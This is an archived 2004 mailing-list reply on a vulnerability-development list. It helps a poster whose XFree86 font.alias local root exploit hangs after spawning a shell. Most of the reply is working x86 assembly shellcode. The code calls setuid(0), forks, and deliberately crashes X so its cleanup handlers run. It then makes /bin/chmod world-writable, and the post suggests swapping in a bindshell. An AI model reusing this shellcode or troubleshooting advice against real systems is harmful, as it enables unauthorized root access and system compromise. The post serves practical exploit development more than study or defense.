Vulnerability Development mailing list archives
Re: XFree86 font.alias exploit hangup....
From: lazy () server gwsh gda pl
Date: Fri, 27 Feb 2004 13:41:03 +0100
On Sun, Feb 22, 2004 at 10:51:18AM -0000, Dev wrote:
My problem is that once i launch the exploit the X display appears momentarily & the keyboard locks up * so now i can only access the box from the network & on a different shell. Offsets etc are all fine & an STRACE yields the following log which does indicate that the exploit was successful & execve'd /bin//sh. But I am confised about the last few lines of the strace log. Plz tell me as to whether my root shell has exited because of some error in the last few calls?
it looks like X closes STDIN or it's unavaiable because text console is disabled so you can't directly use execve. Text console is broken because X i interupted during startup. try this shellcode it chmods 777 /bin/chmod you can change code below dzic: to start a bindshell or try to exec /bin/sh with a delay (to let sighendler do its job) maybe sighandler will make STDIN/STDOUT usefull again The trick is to force SIGSEGV on X to call its cleanup handlers. -----scode.s---- start: //setuid(0) xor %eax,%eax xor %ebx,%ebx mov $0x17,%al int $0x80 //fork xor %eax,%eax movb $0x2,%al int $0x80 test %eax,%eax jz dzic //the trick ;) mov $0x44444444,%ebx call %ebx dzic: //chmod(/bin/chmod,777) xor %edx,%edx xor %eax,%eax mov $0xfff,%dx push %edx push $0x646f6d68 push $0x632f2f6e push $0x69622f2f mov %esp,%ebx mov $0xf,%al int $0x80 //exit mov $0x1,%al int $0x80 ------- -- Lazy
Current thread:
- XFree86 font.alias exploit hangup.... Dev (Feb 25)
- Re: XFree86 font.alias exploit hangup.... lazy (Feb 27)
- Re: XFree86 font.alias exploit hangup.... Marco Ivaldi (Feb 29)
- Re: XFree86 font.alias exploit hangup.... lazy (Feb 27)